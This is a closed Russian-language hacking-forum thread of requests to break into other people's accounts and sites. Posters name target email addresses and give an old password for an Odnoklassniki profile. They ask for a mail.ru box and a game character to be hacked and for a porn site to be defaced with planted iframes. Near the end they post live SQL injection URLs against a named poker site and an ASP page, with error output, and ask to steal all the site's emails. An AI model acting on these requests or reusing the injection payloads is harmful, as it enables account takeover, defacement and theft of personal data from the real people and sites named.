• XSS.stack #1 – первый литературный журнал от юзеров форума

Просьбы Взломать

Статус
Закрыто для дальнейших ответов.
(админы извените что ворвалса в ету тему без правил мне очень нужна ваша помощь)

Здраствуйте помогите сломать страничку в одноклассниках у меня осталса только логин вот такой vitov-vera@ya.ru старый пароль-130701 админы извените что ворвалса в ету тему без правил я свайо наверстаю выручите пажалуйста плиз очень прашу там история тежолая в маэй девушки есть сетра дваюрадная и у нейо муж ревнивый пастаянна бил ейо щас ани разводятса и он узнал о одноклассниках и поменял пароль и шантажируэт что он на эйо страничке виставит ейо фото абнажонной в ванной в душе в кровате ну такое у нево с психикой чтото наверное, если вы сможыте смените пароль и маил и сбросте мне на deluxi@bk.ru плиз ребята очень нужна ваша помощь очень прашу отзовитесь кому не лень и нетяжело ето сделать пожалуйста очень надо плиз!!!!!!!!!

ИЗВЕНИТЕ МЕНЯ ЕСЛИ ЧТОТО НЕ ТАК И ЗА МОЙ РУСКИЙ плохо умею писать

(админы извените что ворвалса в ету тему без правил мне очень нужна ваша помощь)

Соц инженерия в действии.

Автору не жадничать и заказать у людей в разделе провереных услуг взлом сайта. Стоит не так дорого

delux в этом разделе просят взломать безвозмездно, и кто захочет может помочь тебе.А за деньги можеш заказать в другом разделе.

delux

не переживай, обнаженное фото сразу заблокируют на однокласниках.

а если чесно, если ты действительно являешься хозяином акуанта, то ты точно должен знать ответ на секретный вопрос salatik? думаю о каком салате идет речь ты понял. если и тут не помогло, то пусть владелец напишет письмо в службу поддержки, думаю доказать что эта девушка именно она не составит труда. имея под рукой паспортные данные.

Удачи.

Помогите плз ломануть мыло хост mail.ru
Более конкретная информация по аське 476448365
в благодарность могу замутить аваторку, любых размеров
примеры:
str3.gif
bodok10.gif
bodok9.gif
22.gif
20.gif
ba4.gif
ba8.gif
bodok12.gif
bodok11.gif
17.gif

Вот порник, ломайте, сливайте дизайн, ставьте айферймы.
Ебните только его нахер.
Посещение убербольшое и глупое, так что пробив гарантирован :D
Можно еще сделать чтобы деньги с смсок пошли к вам, может.

Помогите!!!! Это уже 5 сайт на который я пишу. В моей любимой браузерной игре королевство. У меня стащили пароль. Короче украли ВСЁ! Админы, лохи полные! Не хотят ничего делать, только говорят что мол сама виновата. И что я сама передала этому козлу всё что у меня было. Это же не справедливо!!! Я осталась без ничего. Взломайте пожалуйста моего персонажа, добавьте ему денег и опыту!!! Умоляю!!!! Мне больше не к кому идти!!! Вы моя последняя надежда! Моя вера в справедливость уничтожена! Если они не справедливы, то и я не должна считаться с их правилами! Прошу, ПОМОГИТЕ! Я не могу жить зная что со мной так подло поступили и никто не хочет помочь и разобраться! Все от меня отвернулись, никому не нужна справедливость! Я просила сделать мне откат, но они не хотят! На коленях прошу - ПОМОГИТЕ!!!! Вот моё мыло, BleakMag@mail.ru Напишите письмо, я вам всё подробно изложу и дам все ссылки. Прошу помогите!

Люди помогите!!!!!!!Я читал что надо месяц быть зарегистрированым и тд.но мне очень нужно подсмотреть один мэйл на Yahoo,одна иностранка-обладательница этого мэйла хочет со мной поделиться деньгами,но мне кажется это развод.
Вот ее адрес: anitaedris30@yahoo.com
Я ей уже по русски объяснил что не надо людей обманывать,а она или он не понимает ,ведь некоторые слова на английский не переводятся.
Помогите пожалуйста.Заранее благодарен.

Добавлено в [time]1249376826[/time]
Люди помогите!!!!!!!Я читал что надо месяц быть зарегистрированым и тд.но мне очень нужно подсмотреть один мэйл на Yahoo,одна иностранка-обладательница этого мэйла хочет со мной поделиться деньгами,но мне кажется это развод.
Вот ее адрес: anitaedris30@yahoo.com
Я ей уже по русски объяснил что не надо людей обманывать,а она или он не понимает ,ведь некоторые слова на английский не переводятся.
Помогите пожалуйста.Заранее благодарен.

Пожалуйста, обратите внимание, что пользователь заблокирован
Халявы не бывает, не верь. Погугли на тему "нигерийские письма".

Какой развод? Как ты мог такое подумать?
Тебе ж несказанно повезло, парень. В Америке много богатых дам, которые шлют деньги русским - это очень популярная акция благотворительности, ага.

Помогите) не шарю в mySQL, шарю пополам в msSQL.. ну хоть убейте, невтыкаю ...

http://www.pokerdvd.net/product.php?id=-18+union+select+1,2,3,concat_ws(0x0b,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15
Помогите с сайта стащить все мыла... :(

Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.

/script/includes/init.asp, line 5853
это при "/view.asp?key=-1 or 1=@@version--"

ктонить может прокомментировать ?

а то это уже напрягает миня =х

Пожалуйста, обратите внимание, что пользователь заблокирован
3.0.x точнее не знаю как глянуть)

Статус
Закрыто для дальнейших ответов.
Верх